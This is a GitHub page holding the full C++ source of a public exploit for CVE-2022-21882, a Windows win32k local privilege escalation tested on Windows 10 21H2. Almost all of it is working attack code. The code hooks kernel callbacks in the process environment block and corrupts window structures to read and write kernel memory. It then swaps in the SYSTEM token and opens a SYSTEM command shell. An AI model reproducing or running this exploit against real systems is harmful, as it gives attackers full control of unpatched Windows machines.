-
Notifications
You must be signed in to change notification settings - Fork 53
/
Copy pathCVE-2022-21882.cpp
308 lines (259 loc) · 11.7 KB
/
CVE-2022-21882.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
// CVE-2022-21882 by @_L4ys
// Only tested on Windows 10 21H2
#include <stdio.h>
#include <windows.h>
#include <intrin.h>
#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440
#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
#define EPROCESS_TOKEN_OFFSET 0x4b8
#define MAGIC_CB_WND_EXTRA 0x1337
typedef PVOID(WINAPI *RTLALLOCATEHEAP)(PVOID HeapHandle, ULONG Flags, SIZE_T Size);
typedef NTSTATUS(WINAPI *NTUSERCONSOLECONTROL)(DWORD, PVOID, ULONG);
typedef NTSTATUS(WINAPI *NTCALLBACKRETURN)(PVOID Result, ULONG ResultLength, NTSTATUS Status);
typedef NTSTATUS(WINAPI *NTUSERMESSAGECALL)(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam, ULONG_PTR ResultInfo, DWORD dwType, BOOL bAscii);
typedef PVOID(WINAPI *HMVALIDATEHANDLE)(HANDLE h, BYTE byType);
RTLALLOCATEHEAP RtlAllocateHeap = NULL;
NTUSERCONSOLECONTROL NtUserConsoleControl = NULL;
NTCALLBACKRETURN NtCallbackReturn = NULL;
NTUSERMESSAGECALL NtUserMessageCall = NULL;
HMVALIDATEHANDLE HMValidateHandle = NULL;
// User mode callbacks
typedef NTSTATUS(WINAPI *XXXCLIENTALLOCWINDOWCLASSEXTRABYTES)(unsigned int *pSize);
typedef NTSTATUS(WINAPI *XXXCLIENTFREEWINDOWCLASSEXTRABYTES)(PVOID pAddress);
XXXCLIENTALLOCWINDOWCLASSEXTRABYTES xxxClientAllocWindowClassExtraBytes = NULL;
XXXCLIENTFREEWINDOWCLASSEXTRABYTES xxxClientFreeWindowClassExtraBytes = NULL;
// Kernel tagWND
#pragma pack(1)
struct tagWND
{
ULONG64 hWnd; // + 0x00
ULONG64 OffsetToDesktopHeap; // + 0x08
ULONG64 state; // + 0x10
DWORD dwExStyle; // + 0x18
DWORD dwStyle; // + 0x1C
BYTE gap[0xa8];
ULONG64 cbWndExtra; // + 0xC8
BYTE gap2[0x18];
DWORD dwExtraFlag; // + 0xE8
BYTE gap3[0x3c];
ULONG64 pExtraBytes; // + 0x128
};
#pragma pack(1)
struct tagMENU
{
ULONG64 field_0;
ULONG64 field_8;
ULONG64 field_10;
ULONG64 field_18;
ULONG64 field_20;
PVOID obj28;
ULONG64 field_30;
ULONG64 field_38;
DWORD cxMenu;
DWORD cyMenu;
ULONG64 field_48;
ULONG64 field_50;
PVOID rgItems; // + 0x58
ULONG64 field_60;
ULONG64 field_68;
ULONG64 field_70;
ULONG64 field_78;
ULONG64 field_80;
ULONG64 field_88;
ULONG64 field_90;
PVOID ref; // + 0x98
};
HWND g_hWnd[50] = {0};
tagWND *g_pWnd[50] = {0};
tagMENU *g_pFakeMenu = 0;
HMVALIDATEHANDLE FindHMValidateHandle()
{
HMVALIDATEHANDLE result = NULL;
HMODULE hUser32 = LoadLibrary(L"user32.dll");
PBYTE p = (PBYTE)GetProcAddress(hUser32, "IsMenu");
for (int i = 0; i < 20; ++i)
{
if (0xe8 == *p++) {
INT offset = *(PINT)p;
result = (HMVALIDATEHANDLE)(p + 4 + offset);
break;
}
}
return result;
}
NTSTATUS WINAPI MyxxxClientAllocWindowClassExtraBytes(unsigned int *pSize)
{
if (*pSize == MAGIC_CB_WND_EXTRA) {
// magicWND->dwExtraFLag |= 0x800
printf("Set magicWND->dwExtraFlag |= 0x800\n");
ULONG64 ConsoleCtrlInfo[2] = {0};
ConsoleCtrlInfo[0] = (ULONG64)g_hWnd[2];
NTSTATUS ret = NtUserConsoleControl(6, &ConsoleCtrlInfo, sizeof(ConsoleCtrlInfo));
// Set magicWND->pExtraBytes to fake offset
printf("Retrun faked pExtraBytes: %llx\n", g_pWnd[0]->OffsetToDesktopHeap);
ULONG64 Result[3] = {g_pWnd[0]->OffsetToDesktopHeap};
return NtCallbackReturn(&Result, sizeof(Result), 0);
}
return xxxClientAllocWindowClassExtraBytes(pSize);
}
NTSTATUS WINAPI MyxxxClientFreeWindowClassExtraBytes(PVOID *pInfo)
{
tagWND *pwnd = (tagWND *)pInfo[0];
// explorer will try to free our faked pExtraBytes, block it to prevent BSOD
if (pwnd->cbWndExtra == MAGIC_CB_WND_EXTRA)
return 1;
return xxxClientFreeWindowClassExtraBytes(pInfo);
}
ULONG64 Read64(ULONG64 address)
{
MENUBARINFO mbi = {0};
mbi.cbSize = sizeof(MENUBARINFO);
RECT Rect = {0};
GetWindowRect(g_hWnd[1], &Rect);
*(PULONG64)g_pFakeMenu->rgItems = address - 0x40;
GetMenuBarInfo(g_hWnd[1], OBJID_MENU, 1, &mbi);
DWORD val[2] = {0};
val[0] = mbi.rcBar.left - Rect.left;
val[1] = mbi.rcBar.top - Rect.top;
return *(PULONG64)val;
}
VOID HookUserModeCallBack()
{
ULONG64 pKernelCallbackTable = (ULONG64) * (ULONG64 *)(__readgsqword(0x60) + 0x58); // PEB->KernelCallbackTable
xxxClientAllocWindowClassExtraBytes = (XXXCLIENTALLOCWINDOWCLASSEXTRABYTES) * (ULONG64 *)((PBYTE)pKernelCallbackTable + 0x3D8); // index = 0x7B
xxxClientFreeWindowClassExtraBytes = (XXXCLIENTFREEWINDOWCLASSEXTRABYTES) * (ULONG64 *)((PBYTE)pKernelCallbackTable + 0x3E0); // index = 0x7C
DWORD dwOldProtect = 0;
VirtualProtect((PBYTE)pKernelCallbackTable + 0x3D8, 0x20, PAGE_READWRITE, &dwOldProtect);
*(PULONG64)((PBYTE)pKernelCallbackTable + 0x3D8) = (ULONG64)MyxxxClientAllocWindowClassExtraBytes;
*(PULONG64)((PBYTE)pKernelCallbackTable + 0x3E0) = (ULONG64)MyxxxClientFreeWindowClassExtraBytes;
VirtualProtect((PBYTE)pKernelCallbackTable + 0x3D8, 0x20, dwOldProtect, &dwOldProtect);
}
VOID UnhookUserModeCallBack()
{
ULONG64 pKernelCallbackTable = (ULONG64) * (ULONG64 *)(__readgsqword(0x60) + 0x58); // PEB->KernelCallbackTable
DWORD dwOldProtect = 0;
VirtualProtect((PBYTE)pKernelCallbackTable + 0x3D8, 0x20, PAGE_READWRITE, &dwOldProtect);
*(PULONG64)((PBYTE)pKernelCallbackTable + 0x3D8) = (ULONG64)xxxClientAllocWindowClassExtraBytes;
*(PULONG64)((PBYTE)pKernelCallbackTable + 0x3E0) = (ULONG64)xxxClientFreeWindowClassExtraBytes;
VirtualProtect((PBYTE)pKernelCallbackTable + 0x3D8, 0x20, dwOldProtect, &dwOldProtect);
}
int main(int argc, char *argv[])
{
printf("CVE-2022-21882 Exploit by @_L4ys\n");
NtUserConsoleControl = (NTUSERCONSOLECONTROL)GetProcAddress(GetModuleHandle(L"win32u.dll"), "NtUserConsoleControl");
NtUserMessageCall = (NTUSERMESSAGECALL)GetProcAddress(GetModuleHandle(L"win32u.dll"), "NtUserMessageCall");
NtCallbackReturn = (NTCALLBACKRETURN)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCallbackReturn");
RtlAllocateHeap = (RTLALLOCATEHEAP)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlAllocateHeap");
HMValidateHandle = FindHMValidateHandle();
WNDCLASSEX WndClass = {0};
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.lpfnWndProc = DefWindowProc;
WndClass.style = CS_VREDRAW | CS_HREDRAW;
WndClass.cbWndExtra = 0x20;
WndClass.hInstance = NULL;
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = L"NormalClass";
RegisterClassEx(&WndClass);
WndClass.cbWndExtra = MAGIC_CB_WND_EXTRA;
WndClass.lpszClassName = L"MagicClass";
RegisterClassEx(&WndClass);
DWORD extra_to_wnd1_offset = 0;
DWORD extra_to_wnd2_offset = 0;
for (int j = 0; j < 5; ++j) {
HMENU hMenu = CreateMenu();
HMENU hHelpMenu = CreateMenu();
AppendMenu(hHelpMenu, MF_STRING, 0x1888, TEXT("about"));
AppendMenu(hMenu, MF_POPUP, (UINT_PTR)hHelpMenu, TEXT("help"));
for (int i = 0; i < 50; ++i) {
g_hWnd[i] = CreateWindowEx(NULL, L"NormalClass", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, hMenu, NULL, NULL);
g_pWnd[i] = (tagWND*)HMValidateHandle(g_hWnd[i], 1);
}
for (int i = 2; i < 50; ++i) {
DestroyWindow(g_hWnd[i]);
}
// Set first window to use kernel desktop heap for extra bytes
ULONG64 ConsoleCtrlInfo[2] = { (ULONG64)g_hWnd[0] };
NTSTATUS status = NtUserConsoleControl(6, &ConsoleCtrlInfo, sizeof(ConsoleCtrlInfo));
g_hWnd[2] = CreateWindowEx(NULL, L"MagicClass", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, NULL, NULL, NULL);
g_pWnd[2] = (tagWND*)HMValidateHandle(g_hWnd[2], 1);
if (g_pWnd[0]->pExtraBytes < g_pWnd[1]->OffsetToDesktopHeap) {
extra_to_wnd1_offset = g_pWnd[1]->OffsetToDesktopHeap - g_pWnd[0]->pExtraBytes;
}
if (g_pWnd[0]->pExtraBytes < g_pWnd[2]->OffsetToDesktopHeap) {
extra_to_wnd2_offset = g_pWnd[2]->OffsetToDesktopHeap - g_pWnd[0]->pExtraBytes;
}
if (!extra_to_wnd1_offset || !extra_to_wnd2_offset) {
printf("Unexpected memory layout, retry %d/5\n", j + 1);
DestroyWindow(g_hWnd[0]);
DestroyWindow(g_hWnd[1]);
DestroyWindow(g_hWnd[2]);
DestroyMenu(hMenu);
DestroyMenu(hHelpMenu);
if (j == 4) {
printf("Give up\n");
return 1;
}
continue;
}
printf("Offset of tagWND0->pExtraBytes and tagWND1 = %x\n", extra_to_wnd1_offset);
printf("Offset of tagWND0->pExtraBytes and tagWND2 = %x\n", extra_to_wnd2_offset);
break;
}
HookUserModeCallBack();
printf("Trigger xxxValidateClassAndSize\n");
// Trigger xxxSwitchWndProc -> xxxValidateClassAndSize to call our usermode callbacks
NtUserMessageCall(g_hWnd[2], WM_CREATE, 0, 0, 0, 0, 0);
// Now magic window's pExtraBytes points to tagWND0
SetWindowLong(g_hWnd[2], offsetof(tagWND, cbWndExtra) + 0x10, 0xFFFFFFFF); // Use OOB to modify tagWND1's cbWndExtra
// Create a fake spmenu
PVOID hHeap = GetProcessHeap();
g_pFakeMenu = (tagMENU *)RtlAllocateHeap(hHeap, 0, 0xA0);
g_pFakeMenu->ref = RtlAllocateHeap(hHeap, 0, 0x20);
*(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;
// cItems = 1
g_pFakeMenu->obj28 = RtlAllocateHeap(hHeap, 0, 0x200);
*(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;
// rgItems
g_pFakeMenu->rgItems = RtlAllocateHeap(hHeap, 0, 0x8);
// cx / cy must > 0
g_pFakeMenu->cxMenu = 1;
g_pFakeMenu->cyMenu = 1;
// Set WS_CHILD to set spmenu with GWLP_ID
DWORD style = g_pWnd[1]->dwStyle;
SetWindowLong(g_hWnd[0], extra_to_wnd1_offset + offsetof(tagWND, dwStyle), style | WS_CHILD);
ULONG64 pmenu = SetWindowLongPtr(g_hWnd[1], GWLP_ID, (LONG_PTR)g_pFakeMenu); // Set fake spmenu and leak its kernel address
printf("pWnd1->spmenu = %llx\n", pmenu);
// Remove WS_CHILD to use GetMenuBarInfo
SetWindowLong(g_hWnd[0], extra_to_wnd1_offset + offsetof(tagWND, dwStyle), style);
// Token stealing
ULONG64 p = Read64(pmenu + 0x50); // pmenu->spwndNotify (tagWND)
p = Read64(p + 0x10); // pwnd->pti (THREADINFO)
p = Read64(p + 0x1A0); // pti->ppi (PROCESSINFO)
p = Read64(p); // ppi.W32PROCESS.peProcess
ULONG64 eprocess = p;
printf("Current EPROCESS = %llx\n", eprocess);
do {
p = Read64(p + EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET) - EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET;
ULONG64 pid = Read64(p + EPROCESS_UNIQUE_PROCESS_ID_OFFSET);
if (pid == 4) {
printf("System EPROCESS = %llx\n", p);
ULONG64 pSystemToken = Read64(p + EPROCESS_TOKEN_OFFSET);
printf("pSystem Token = %llx \n", pSystemToken);
ULONG64 pCurrentToken = eprocess + EPROCESS_TOKEN_OFFSET;
LONG_PTR old = SetWindowLongPtr(g_hWnd[0], extra_to_wnd1_offset + offsetof(tagWND, pExtraBytes), (LONG_PTR)pCurrentToken);
SetWindowLongPtr(g_hWnd[1], 0, pSystemToken);
SetWindowLongPtr(g_hWnd[0], extra_to_wnd1_offset + offsetof(tagWND, pExtraBytes), (LONG_PTR)old);
break;
}
} while (p != eprocess);
system("cmd");
// Fix corrupted tagWND
PVOID pExtraBytes = RtlAllocateHeap(hHeap, 0, MAGIC_CB_WND_EXTRA);
SetWindowLongPtr(g_hWnd[0], extra_to_wnd2_offset + offsetof(tagWND, pExtraBytes), (ULONG_PTR)pExtraBytes);
SetWindowLongPtr(g_hWnd[0], extra_to_wnd2_offset + offsetof(tagWND, dwExtraFlag), g_pWnd[2]->dwExtraFlag & ~0x800);
style = g_pWnd[1]->dwStyle;
SetWindowLong(g_hWnd[0], extra_to_wnd1_offset + offsetof(tagWND, dwStyle), style | WS_CHILD);
SetWindowLongPtr(g_hWnd[1], GWLP_ID, (UINT_PTR)pmenu); // tagWND1->spmenu = pmenu
SetWindowLong(g_hWnd[0], extra_to_wnd1_offset + offsetof(tagWND, dwStyle), style);
UnhookUserModeCallBack();
}